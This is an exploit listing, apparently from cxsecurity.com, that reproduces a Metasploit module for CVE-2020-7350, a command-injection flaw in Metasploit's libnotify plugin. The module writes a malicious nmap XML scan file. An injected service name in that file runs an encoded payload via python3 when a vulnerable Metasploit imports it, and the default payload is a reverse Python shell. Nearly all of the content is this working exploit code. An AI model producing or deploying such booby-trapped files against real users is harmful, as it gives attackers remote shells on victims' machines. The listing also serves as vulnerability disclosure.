Metasploit Libnotify Arbitrary Command Execution

2020.04.18
Credit: pasta
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Metasploit Libnotify Plugin Arbitrary Command Execution', 'Description' => %q( This module exploits a shell command injection vulnerability in the libnotify plugin. This vulnerability affects Metasploit versions 5.0.79 and earlier. ), 'DisclosureDate' => 'Mar 04 2020', 'License' => GPL_LICENSE, 'Author' => [ 'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC ], 'References' => [ [ 'CVE', '2020-7350' ], [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ] ], 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Payload' => { 'DisableNops' => true }, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_python' }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']), ] ) end def exploit xml = %(<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE nmaprun> <nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar 6 11:04:40 2020" version="7.60" xmloutputversion="1.04"> <host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/> <address addr="192.168.20.121" addrtype="ipv4"/> <hostnames> </hostnames> <ports> <port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port> </ports> <times srtt="6174" rttvar="435" to="100000"/> </host> <runstats><finished time="1583503480" timestr="Fri Mar 6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar 6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/> </runstats> </nmaprun> ) print_status "Writing xml file: #{datastore['FILENAME']}" file_create xml end end


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top